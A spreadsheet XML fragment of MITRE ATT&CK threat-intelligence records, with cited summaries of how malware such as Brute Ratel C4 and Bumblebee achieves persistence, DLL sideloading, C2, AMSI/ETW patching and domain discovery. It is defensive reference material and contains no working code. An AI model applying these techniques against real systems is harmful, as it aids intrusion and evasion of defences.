    <t>relationship--fd79762c-1718-4c6b-adaa-a9a004bcdbca</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can establish persistence by writing the Registry value &lt;code&gt;MicroNativeCacheSvc&lt;/code&gt; to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--cba3f208-4db7-486b-adb1-311910b0382d</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can use RunDLL32 for execution.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--11abcf3d-3fe2-4b5e-8590-9509a881d877</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can enumerate the hostname, domain, and IP of a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--773efcb6-760f-496f-92e9-2387d04d2c53</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can enumerate the username on a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--d1f2ae2f-66e2-4dff-a806-75097d6c9c19</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has used HTTP POST requests for C2.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--489f5525-51d1-4f03-bcc2-279f017f96d4</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can download files from Dropbox using a hardcoded access token.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--3614b421-b869-4b33-a979-0c09f0bc275f</t>
  </si>
  <si>
    <t xml:space="preserve">[BoxCaon](https://attack.mitre.org/software/S0651) has used DropBox for C2 communications.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>relationship--092ae5be-2a12-46ff-8122-2e308d954401</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) established persistence by setting the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load&lt;/code&gt; registry key to point to its executable.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--99070a6a-e0c3-455b-8e4b-9239206e56ec</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can upload files from a compromised host.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--75db2ffc-f33f-4735-a3eb-139d959b0b50</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) uploads files and data from a compromised host over the existing C2 channel.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--7cf62137-2a28-4a11-b64d-8b9409656bc9</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--b38a0fe4-6482-4c13-9def-5c8a82f31226</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) has searched for files on the system, such as documents located in the desktop folder.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--1c4fd1a5-c3a4-4f71-8310-785962dc65d4</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can download files.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--237429d4-808b-478f-ab0f-a01bff89834e</t>
  </si>
  <si>
    <t xml:space="preserve">[BoxCaon](https://attack.mitre.org/software/S0651) has created a working folder for collected files that it sends to the C2 server.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>relationship--e27daa6c-3577-4f58-9440-7a585e9571d9</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) has used Windows API calls to obtain information about the compromised host.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--3436ac2b-eadf-4aec-bd3a-cb814fd057b8</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) used the "StackStrings" obfuscation technique to hide malicious functionalities.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--b6bfd59b-086e-4559-9bc0-159945c84e78</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can collect the victim's MAC address by using the &lt;code&gt;GetAdaptersInfo&lt;/code&gt; API.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--cb0d2895-e692-46af-80e7-2bbc3c40600f</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can execute arbitrary commands and utilize the "ComSpec" environment variable.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--0b440f89-cffb-458c-bc16-c64af09230c6</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) terminates antimalware processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--f5633e19-e1be-4631-b714-d88016ded128</t>
  </si>
  <si>
    <t>Some [Brave Prince](https://attack.mitre.org/software/S0252) variants have used South  Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--28a113cd-efdc-49cf-b6d2-c967e11de751</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers file and directory information from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--69127424-40bb-4b92-8558-6fe1561e0a59</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) lists the running processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--2d1beee9-0b61-4e66-9487-97f1665bbedc</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers information about the Registry.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--ab08048c-4d1f-4214-9f53-1e87f6a20988</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) collects hard drive content and system configuration information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--0f66681a-7daf-4cd7-99af-3005b6586306</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers network configuration information as well as the ARP cache.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--bfa47cf5-93e4-451e-a2eb-dadca6ae6bb0</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) downloads files onto infected hosts.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>relationship--36755c7d-92bf-4851-91ef-f1bf41f27210</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) creates run key Registry entries pointing to malicious DLLs dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>relationship--7ae71a39-4f64-4d64-ad3f-885ae7a5c613</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) entries to execute malicious DLLs.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>relationship--138da0bb-befa-45cd-9ca4-c74b86ac61ff</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) installs a service pointing to a malicious DLL dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>relationship--0b4cd78b-e0af-4123-b2aa-02ad66cca419</t>
  </si>
  <si>
    <t>S1063</t>
  </si>
  <si>
    <t>Brute Ratel C4</t>
  </si>
  <si>
    <t>tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used search order hijacking to load a malicious payload DLL as a dependency to a benign application packaged in the same ISO.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--f318a490-68df-41ee-864e-8611be36c442</t>
  </si>
  <si>
    <t>07 February 2023</t>
  </si>
  <si>
    <t>08 February 2023</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has loaded a malicious DLL by spoofing the name of the legitimate Version.DLL  and placing it in the same folder as the digitally-signed Microsoft binary OneDriveUpdater.exe.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--09140332-07f8-4afe-84bd-be7067bad810</t>
  </si>
  <si>
    <t>09 February 2023</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use DNS over HTTPS for C2.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--c4014fde-9d6e-4605-a143-36556a280249</t>
  </si>
  <si>
    <t xml:space="preserve">
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to upload files from a compromised system.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--767e6737-fcf8-48ae-a6a3-045c9a03b0e2</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to deobfuscate its payload prior to execution.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--7ee1407c-ee33-47bc-824a-6f0dcd385462</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use LDAP queries, `net group "Domain Admins" /domain` and `net user /domain` for discovery.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--959c7695-01a5-4be1-9951-799749796cf4</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use `net group` for discovery on targeted domains.(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--80cbc348-7246-418a-8b25-e112408a498b</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use LDAP queries and `nltest /domain_trusts` for domain trust discovery.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--a4e9aaf6-2c02-45cf-9603-090d65cd8c37</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can call and dynamically resolve hashed APIs.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--db7db901-6b19-4cd2-9d22-17b5703bbf7f</t>
  </si>
  <si>
    <t>13 February 2023</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to hide memory artifacts and to patch Event Tracing for Windows (ETW) and the Anti Malware Scan Interface (AMSI).(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)</t>
  </si>
  <si>
    <t>relationship--8c3d3be5-88b1-4ad8-a775-822bed655615</t>
  </si>
  <si>
    <t xml:space="preserve">
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can download files to compromised hosts.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--d723027c-349b-48f8-af77-808ee2f7d92f</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can decode Kerberos 5 tickets and convert it to hashcat format for subsequent cracking.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--fb20c1f3-aa1e-49f3-9793-e07e0d430f5d</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has gained execution through users opening malicious documents.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--fef97c89-06fe-4def-b58b-5dafd9ff925d</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used Microsoft Word icons to hide malicious LNK files.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--93ae2467-4192-4e69-a63a-00ca8cb055c2</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used a payload file named OneDrive.update to appear benign.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--67e631d1-439f-4630-9662-8ea74ab10234</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can call multiple Windows APIs for execution, to share memory, and defense evasion.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)</t>
  </si>
  <si>
    <t>relationship--b323db77-6bbf-4020-ac48-bee625dd44f2</t>
  </si>
  <si>
    <t>17 February 2023</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can conduct port scanning against targeted systems.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--9ee893d7-f87e-4d2e-a440-4ba9cb3a3561</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to use TCP for external C2.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--d661c7eb-11bb-4ef4-804e-665cc361789c</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used encrypted payload files and maintains an encrypted configuration structure in memory.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)</t>
  </si>
  <si>
    <t>relationship--58d4910f-9d51-4961-84eb-9ef0ee2e8bc3</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can enumerate all processes and locate specific process IDs (PIDs).(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--58be00f9-baaf-40d7-973f-3f38bc7322b9</t>
  </si>
  <si>
    <t>relationship--8121e11c-6bd7-4b4a-8072-bb9622e6627c</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used reflective loading to execute malicious DLLs.(Citation: MDSec Brute Ratel August 2022)</t>
  </si>
  <si>
    <t>relationship--9b7f7aab-6ee4-4205-bd25-39cd63216777</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to use RPC for lateral movement.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--9a340fa8-70c5-4bf6-a8c2-6e28e3fc8b59</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to use SMB to pivot in compromised networks.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: Dark Vortex Brute Ratel C4)</t>
  </si>
  <si>
    <t>relationship--6ecd51f2-d57d-4daa-a98f-764b9b3ddac1</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can take screenshots on compromised hosts.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--4f8e76b5-603e-4557-8635-465d988a4072</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can detect EDR userland hooks.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--81e6eb4d-4a94-4416-8a45-b54e9cafda9d</t>
  </si>
  <si>
    <t xml:space="preserve">
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can create Windows system services for execution.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--21c271aa-7bdd-44ea-afd0-ca3f542ee425</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can call `NtDelayExecution` to pause execution.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)</t>
  </si>
  <si>
    <t>relationship--dec02920-c2d1-4340-a503-f6a38ae0b0f7</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use HTTPS and HTTPS for C2 communication.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--ff274d3e-584d-4c50-8262-185630017502</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use legitimate websites for external C2 channels including Slack, Discord, and MS Teams.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--c1b5996f-e0f9-4986-9ee1-c5c9dc85d8e5</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use cmd.exe for execution.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--275a2606-3eee-4c11-8a97-300b58f49d60</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use WMI to move laterally.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--5d5077b6-4490-4762-8b8f-ba4e0655ec67</t>
  </si>
  <si>
    <t>[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use WinRM for pivoting.(Citation: Palo Alto Brute Ratel July 2022)</t>
  </si>
  <si>
    <t>relationship--3c40e9a1-72fd-4c7d-8a69-df574c54441e</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can compress data stolen from the Registry and volume shadow copies prior to exfiltration.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--3df9c843-4833-45f9-a1ae-f7231d8410c4</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use asynchronous procedure call (APC) injection to execute commands received from C2.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--5bc09eae-6b6c-4dd3-9e27-a2f26f0a6468</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--b8113737-894f-42de-b607-9d4905fcdfc3</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use a COM object to execute queries to gather system information.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--eedbb286-aa6f-49a6-8e6a-283ad45f8938</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can capture and compress stolen credentials from the Registry and volume shadow copies.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--4c530431-2ad0-4ee9-97d1-4e489aa2436f</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can search for tools used in static analysis.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--f015b898-b057-40e4-9add-c4fa1e100f7e</t>
  </si>
  <si>
    <t>06 September 2022</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can deobfuscate C2 server responses and unpack its code on targeted hosts.(Citation: Proofpoint Bumblebee April 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--3471a32a-47fc-4ba7-ac67-887d9872e316</t>
  </si>
  <si>
    <t>The [Bumblebee](https://attack.mitre.org/software/S1039) loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>relationship--3bcce871-6b9d-4eaf-9364-80dea3cb7ef9</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can send collected data in JSON format to C2.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--1d11c326-7640-4ddd-b5fe-c8eaf4097c20</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use backup C2 servers if the primary server fails.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--7327153c-c123-401b-b675-554b8070fbed</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can uninstall its loader through the use of a `Sdl` command.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--f1122ac6-d8f4-43d4-9102-0a41db245b69</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can download and execute additional payloads including through the use of a `Dex` command.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>relationship--7065f730-96fc-4a33-b6fb-101af568b74b</t>
  </si>
  <si>
    <t>25 August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</si>
  <si>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</si>
  <si>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relationship--d0efbf46-7f6a-4bf9-be4f-a52cd510174c</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has relied upon a user downloading a file from a OneDrive link for execution.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--c4600507-03d9-471f-a175-d5fd3953c0c6</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has named component DLLs "RapportGP.dll" to match those used by the security company Trusteer.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--7caebc50-4c1b-4ac0-953b-705d9e1026f4</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use multiple Native APIs.(Citation: Proofpoint Bumblebee April 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--8ba708a9-07a3-4c4e-8fee-15a1cdabf2f7</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</si>
  <si>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</si>
  <si>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relationship--a0040bac-4445-4999-bf0f-53b340f02218</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use `odbcconf.exe` to run DLLs on targeted hosts.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--463dc38c-7b05-4ddf-aa27-cce8afef9171</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use PowerShell for execution.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--d4bf0c1a-d5cf-4d49-b0eb-4d347722ab63</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can identify processes associated with analytical tools.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--c0fc62bc-ac39-4840-968d-8a3f8f3ce6a0</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can inject code into multiple processes on infected endpoints.(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--836575fd-ffa1-4531-8c16-c875b7f0c177</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can check the Registry for specific keys.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--acbf0f3f-5dd4-42ad-9399-047b8ff5dc0a</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has used `rundll32` for execution of the loader component.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>relationship--7af072a8-2a24-42c4-9cdc-7e060693849e</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</si>
  <si>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</si>
  <si>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relationship--cf72062c-b62f-4127-b7e3-ac3f941a9599</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can identify specific analytical tools based on running processes.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--502d4200-719b-4b42-8221-0ecd0ed0d6e7</t>
  </si>
  <si>
    <t xml:space="preserve"> [Bumblebee](https://attack.mitre.org/software/S1039) can use `LoadLibrary` to attempt to execute GdiPlus.dll.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--a7ec0d1d-462b-4909-acee-f2aa1f9199b1</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</si>
  <si>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</si>
  <si>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relationship--c7721c41-83aa-4988-b431-e3135028d11e</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has been spread through e-mail campaigns with malicious links.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--741c03f1-5c9c-4737-bf2d-279503a042ab</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to base64 encode C2 server responses.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--7a4ed5e2-6a96-4faf-b647-2372490cfcb2</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can encrypt C2 requests and responses with RC4(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--b5cbd882-e5dc-468e-b853-5e6e24583741</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.(Citation: Medium Ali Salem Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--2815c919-1fcb-4ddc-bb04-56dff63854e7</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can enumerate the OS version and domain on a targeted system.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>relationship--02a1f8ce-390e-46e4-b945-9cd61c593f9f</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to identify the user name.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--128eeb8d-c492-4dbf-a423-0b68a4b53443</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to set a hardcoded and randomized sleep interval.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--45eef730-8c5b-45fb-9cd9-c7998a764898</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to perform anti-virtualization checks.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--6515b62c-af1a-4b22-baca-0710ac898815</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can create a Visual Basic script to enable persistence.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>relationship--5f7db516-c204-4e6b-9bda-b891bf763843</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) has been downloaded to victim's machines from OneDrive.(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--63b1af38-765d-4181-add0-dbd3f31941ff</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use `cmd.exe` to drop and run files.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--1e8fbfc4-4992-490a-9a91-e304eb965c0d</t>
  </si>
  <si>
    <t>[Bumblebee](https://attack.mitre.org/software/S1039) can use WMI to gather system information and to spawn processes for code injection.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--1c935a6d-dd69-4be3-bfed-56c01d0f9413</t>
  </si>
  <si>
    <t>S0482</t>
  </si>
  <si>
    <t>Bundlore</t>
  </si>
  <si>
    <t>malware--7bef1b56-4870-4e74-b32a-7dd88c390c44</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--cb53d2b5-6606-4597-b5e9-d9c114e2607e</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--b7366815-256b-4e67-839a-1eb9aba03721</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used &lt;code&gt;openssl&lt;/code&gt; to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--68cfc5f9-3c65-4f24-8018-cf811d7b6c9f</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</si>
  <si>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</si>
  <si>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relationship--fe8efec3-2ab4-497d-8e5a-b2340feddd8f</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
